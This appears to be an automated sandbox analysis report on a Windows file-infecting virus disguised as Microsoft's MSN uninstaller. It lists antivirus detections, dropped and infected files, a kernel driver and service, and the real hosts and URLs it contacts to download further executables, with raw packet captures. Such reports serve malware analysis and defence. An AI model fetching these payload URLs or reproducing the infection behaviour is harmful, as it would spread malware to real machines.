Analysis Date2015-08-30 10:36:12
MD5c706818999d4ee58e1a92e861bae4593
SHA17a5f1744cb9dc27b25f41f35dfcc7dd9cda8ef94

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c02003b9f50c63f6a112afcee0c8057e sha1: 7a491315e9fb929b216e9d249e0b05bee0c28465 size: 16384
Section.data md5: 2395a14b242238675b3a7322d039eb97 sha1: 9221e044437a07c96ff3c8a686e1f031edf554aa size: 4096
Section.rsrc md5: baabdff38152118699c72fc17e454372 sha1: 519883dd302e18b465fe071e2fb2957501e1d7ad size: 8192
Section!55u md5: ffccfd36c9221262daf9c80078381cc6 sha1: 7609473bf88e44f5d63c27ecdb506b5d8da32e38 size: 20480
Section.tc md5: e347d822422ba661f7c3e4bf8a8b7f6f sha1: 6bf1063e8583ccbf180c94472bdff061fe1558a8 size: 28672
SectionW55uj md5: ac24c787a37de1970c6a76cc925d23ae sha1: f9be0490c0e36e40543b7f0a43fc0faf38f3b8fd size: 20480
Timestamp2001-07-19 19:29:57
Pdb pathpdb
VersionLegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: MSNUNIN
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: MSN Uninstall Progman
OriginalFilename: MSNUNIN.EXE
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: MSNUNIN
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: MSN Uninstall Progman
OriginalFilename: MSNUNIN.EXE
PEhash1234840ca0de89bfdc80714a9d3a95e2890a2ea7
IMPhash2a1c59f2822a4b9e0435e5c824306502
AVRisingWin32.Roue.a
AVMcafeeW32/Kudj
AVAvira (antivir)W32/Jadtre.B
AVTwisterVirus.558BEC81EC@120000#.mg
AVAd-AwareWin32.VJadtre.3
AVAlwil (avast)Malware-gen:Viking-CF:Win32:Malware-gen:Win32:Viking-CF
AVEset (nod32)Win32/Wapomi.BA virus
AVGrisoft (avg)Win32/Wapomi.I
AVSymantecW32.Wapomi.C!inf
AVFortinetW32/Nimnul.F
AVBitDefenderWin32.VJadtre.3
AVK7Virus ( 0040f7441 )
AVMicrosoft Security EssentialsVirus:Win32/Mikcer.B
AVMicroWorld (escan)Win32.VJadtre.3
AVMalwareBytesno_virus
AVAuthentiumW32/PatchLoad.E
AVFrisk (f-prot)W32/PatchLoad.E
AVIkarusTrojan-Downloader.Win32.Small
AVEmsisoftWin32.VJadtre.3
AVZillya!Virus.Nimnul.Win32.5
AVKasperskyVirus.Win32.Nimnul.f
AVTrend MicroPE_WAPOMI.BM
AVCAT (quickheal)W32.Nimnul.F1
AVVirusBlokAda (vba32)Virus.Nimnul.19209
AVPadvishno_virus
AVBullGuardWin32.VJadtre.3
AVArcabit (arcavir)Win32.VJadtre.3
AVClamAVWin.Trojan.Downloader-64296
AVDr. WebBackDoor.Darkshell.246
AVF-SecureWin32.VJadtre.3
AVCA (E-Trust Ino)Win32/Nimnul.A

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\cbikpg.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\vnqCGv.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\vnqCGv.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\cbikpg.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\WINDOWS\system32\cmd.exe

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState\Settings ➝
NULL
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}\iexplore\Type ➝
3
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{FB5F1910-F110-11D2-BB9E-00C04F795683}\iexplore\Type ➝
4
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\NetworkService\Favorites\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Favorites\Desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates MutexShell.CMruPidlList
Winsock DNSnbtj.114anhui.com

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\vnqCGv.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates FilePIPE\lsarpc
Creates FileC:\temp\files\vnqCGv.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates FileC:\temp\files\malware.exe
Winsock DNSddos.dnsnb8.net
Winsock URLhttp://ddos.dnsnb8.net:799/cj//k1.rar

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Starts ServiceWmdmPmSN

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\cbikpg.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\temp\files\AcroRd32.exe
Creates FileC:\temp\files\AcroRd32Info.exe
Creates FileC:\temp\files\Expor.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates FileC:\temp\files\setup.exe
Creates FileC:\temp\files\instmsiw.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates FileC:\temp\files\reader_sl.exe
Creates FilePIPE\lsarpc
Creates FileC:\temp\files\Digcore.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\temp\files\malware.exe
Creates FileC:\temp\files\msnsusii.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates FileC:\temp\files\AdobeUpdateManager.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates FileC:\temp\files\cbikpg.exe
Creates FileC:\temp\files\monitor.exe
Creates FileC:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates FileC:\temp\files\vnqCGv.exe
Creates FileC:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates FileC:\temp\files\Msncli.exe
Creates FileC:\temp\files\acroaum.exe
Winsock DNSddos.dnsnb8.net
Winsock URLhttp://ddos.dnsnb8.net:799/cj//k1.rar

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileNtHid
Creates FilePIPE\lsarpc
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates File\Device\Afd\AsyncConnectHlp
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Creates ProcessC:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS141.8.226.14
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com
Winsock URLhttp://141.8.226.14/ko/03.exe
Winsock URLhttp://141.8.226.14/ko/02.exe
Winsock URLhttp://141.8.226.14/ko/01.exe

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00
Creates FileWMIDataDevice

Process
↳ Pid 1856

Process
↳ Pid 1168

Network Details:

DNSnbtj.114anhui.com
Type: A
193.166.255.171
DNSwww.a.shifen.com
Type: A
103.235.46.39
DNSpc1.114central.com
Type: A
141.8.226.14
DNSddos.dnsnb8.net
Type: A
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://141.8.226.14/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://nbtj.114anhui.com/msn/163.htm?2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://141.8.226.14/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://141.8.226.14/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1036 ➝ 141.8.226.14:80
Flows TCP192.168.1.1:1038 ➝ 193.166.255.171:80
Flows TCP192.168.1.1:1039 ➝ 141.8.226.14:80
Flows TCP192.168.1.1:1040 ➝ 141.8.226.14:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6d736e 2f313633 2e68746d   GET /msn/163.htm
0x00000010 (00016)   3f322048 5454502f 312e300d 0a416363   ?2 HTTP/1.0..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x00000030 (00048)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000040 (00064)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000050 (00080)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000060 (00096)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000070 (00112)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000080 (00128)   290d0a48 6f73743a 206e6274 6a2e3131   )..Host: nbtj.11
0x00000090 (00144)   34616e68 75692e63 6f6d0d0a 436f6e6e   4anhui.com..Conn
0x000000a0 (00160)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20313431 2e382e32 32362e31   ost: 141.8.226.1
0x00000090 (00144)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a416c69   eep-Alive....Ali
0x000000b0 (00176)   76650d0a 0d0a                         ve....


Strings